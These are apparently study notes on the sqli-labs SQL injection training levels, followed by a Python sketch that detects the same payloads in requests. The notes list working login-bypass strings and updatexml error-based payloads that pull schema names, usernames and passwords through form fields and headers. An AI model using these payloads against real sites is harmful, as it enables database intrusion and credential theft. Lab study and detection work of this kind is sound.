less-11

less-12
Same as 11, ");
less-13
sqlmap can also be used:

less-14
uname=admin"#&passwd=admin&Submit=Submit
Same as 13;
sqlmap can also be used
less-15
uname=admin'#&passwd=admin&Submit=Submit
less-16
uname=admin")#&passwd=admin&Submit=Submit
less-17

The user's name must be known
updatexml(1,concat(0x7e,(SELECT@@version),0x7e),1)
Construct the payload using this statement
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)#&Submit=Submit
Using MySQL version 5.5.29
less-18
Use the modheader plugin
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
' or updatexml(1,concat(0x7e,(database())),1),'','')#
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1),'','')#
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1),'','')#
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1),'','')#
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1),'','')#
' or updatexml(1,concat(0x7e,(select password from security.users limit 0,1)),1),'','')#
less-19

Basically the same as level 18 (referer)
less-20
The cookie is injectable
union select (union query)
less-21
less-22
Same as 21 "
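Seen from the logging side, the techniques in the notes for less-14 to less-20 (quote-and-comment closure, updatexml error output, information_schema enumeration, union select) leave recognisable strings in form parameters and in the User-Agent, Referer and Cookie headers. The following detection sketch is an added example, not part of the original notes; the rule names, the field list and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Form parameters and header fields the notes inject through (assumed field names).
WATCHED = ("uname", "passwd", "user-agent", "referer", "cookie")

# Signatures of the techniques used in the notes; rule names are hypothetical.
RULES = {
    "updatexml_error_based": re.compile(r"updatexml\s*\(", re.I),
    "schema_enumeration": re.compile(r"information_schema\s*\.", re.I),
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "quote_then_comment": re.compile(r"['\"]\s*\)?\s*(#|--\s)"),
}
# Map typographic quotes to ASCII so pasted payloads match the same rules.
QUOTES = str.maketrans("‘’“”", "''\"\"")

def scan_request(fields):
    """Return sorted (field, rule) pairs for every watched field that matches."""
    hits = []
    for name, raw in fields.items():
        if name.lower() not in WATCHED:
            continue
        text = unquote_plus(raw).translate(QUOTES)  # URL-decode, then normalise
        hits += [(name.lower(), rule) for rule, rx in RULES.items() if rx.search(text)]
    return sorted(hits)

# Constructed sample requests (not captured traffic).
SAMPLES = [
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "Referer": "http://lab.example/Less-18/", "uname": "admin", "passwd": "admin"},
    {"User-Agent": "' or updatexml(1,concat(0x7e,(database())),1),'','')#"},
    {"Cookie": "uname=x' union select 1,2,3#"},
    {"uname": "admin", "passwd": "admin%27+and+updatexml(1,concat(0x7e,"
     "(select+schema_name+from+information_schema.schemata+limit+0,1)),1)%23"},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan_request(sample))
```

Matches like these are triage signals only; the fix for every level in the notes is to bind the parameter, header or cookie value as data in a prepared statement instead of concatenating it into the query.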

